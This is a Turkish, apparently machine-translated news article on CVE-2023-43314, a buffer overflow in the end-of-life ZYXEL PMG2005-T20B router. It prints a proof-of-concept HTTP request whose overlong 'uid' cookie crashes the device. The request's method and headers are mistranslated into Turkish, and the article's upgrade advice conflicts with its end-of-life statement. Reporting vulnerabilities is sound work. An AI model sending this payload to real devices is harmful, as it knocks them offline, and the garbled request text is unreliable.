ZYXEL Buffer Overflow güvenlik açığı – Saldırgan DoS Saldırısı Başlattı


ZYXEL’in, ZYXEL-PMG2005-T20B cihazında hizmet reddi durumuna neden olabilecek bir Arabellek Taşması güvenlik açığı olduğu keşfedildi. Bu durum, kullanıcının HTTP isteğinde sağladığı girişin uygunsuz şekilde temizlenmesi nedeniyle ortaya çıkar.

Zyxel, Yönlendiriciler, DSL CPE, WiFi Sistemleri, 5G NR/4G LTE CPE, Taşıyıcı ve Erişim Anahtarları, Ağ Genişleticileri ve Ağ Yönetimi cihazları gibi çeşitli ağ ürünleri üreten Tayvanlı çok uluslu bir şirkettir.

Teknik Analiz

Bir tehdit aktörü, Uid parametresine hazırlanmış bir komut dosyası sağlayarak bu güvenlik açığından yararlanabilir. cgi-bin/login.asp, Arabellek Taşmasına yol açarak sonunda DoS durumuna neden olur. Bu güvenlik açığı CVE’ye CVE-2023-43314 olarak atanmıştır ve ciddiyeti analiz edilmektedir.

Belge

Ücretsiz demo

Yapay Zeka Destekli E-posta güvenlik çözümlerini uygulamak “Trustifi”, işletmenizi E-posta İzleme, Engelleme, Değiştirme, Kimlik Avı, Hesabın Devralınması, İş E-postasının Tehlikeye Atılması, Kötü Amaçlı Yazılım ve Fidye Yazılımı gibi günümüzün en tehlikeli e-posta tehditlerine karşı koruyabilir

Bu güvenlik açığı, ZYXEL-PMG2005-T20B ürününde, kullanıcı kimliğindeki yönetici sayısı maksimum 50 eşiğini aştığında ortaya çıkar ve arka uçta ayrıştırıldığında uygulamanın çökmesine neden olur. Ek olarak, ZYXEL ürünüyle geçerli bir oturum oluşturmak için HTTP isteğindeki COOKIE başlığına bir SESSIONID parametresi sağlanır.

Ancak daha ileri analizler, ZyXEL web sitesine göre ZYXEL-PMG2005-T20B ürününün Kullanım Ömrünün Sonuna ulaştığını ortaya çıkardı.

Hayatın sonu
Kullanım Ömrü Sonu (Kaynak: Siber Güvenlik Haberleri)

Araştırmacı, bu güvenlik açığını aşağıdaki parametreler ve değerlerle çoğaltmak için bir HTTP isteği oluşturdu.

ELDE ETMEK /cgi-bin/index.asp HTTP/1.1
Ana makine: {HOST IP}
Yükseltme-Güvensiz-İstekler: 1
Kullanıcı Aracısı: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, Gecko gibi) Chrome/109.0.5414.120 Safari/537.36
Kabul et: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q= 0,9
Yönlendiren: http://{HOST IP}/cgi-bin/login.asp
Kabul-Kodlama: gzip, deflate
Kabul-Dil: zh-CN,zh;q=0.9
Çerez: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Bağlantı: kapat

ZyXEL ürününe yapılan bu istek, yönetici eşiklerinin sayısı nedeniyle Arabellek Taşmasına neden olur ve Hizmet Reddi durumuna neden olur. Buna ek olarak güvenlik araştırmacısı tarafından aynı güvenlik açığından etkilenen 20’den fazla URL listelendi.

Bu güvenlik açığı, varlığı ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan kavram kanıtıyla birlikte bir GitHub deposu yayınlandı.

Bu ZyXEL ürününün kullanıcılarının, bu güvenlik açığından yararlanılmasını önlemek için ürünün en son sürümüne yükseltmeleri önerilir.

850’den fazla üçüncü taraf uygulamaya hızla yama uygulamak için Patch Manager Plus’ı kullanarak kendinizi güvenlik açıklarından koruyun. Avantajlardan yararlanın ücretsiz deneme % 100 güvenlik sağlamak için.



Source link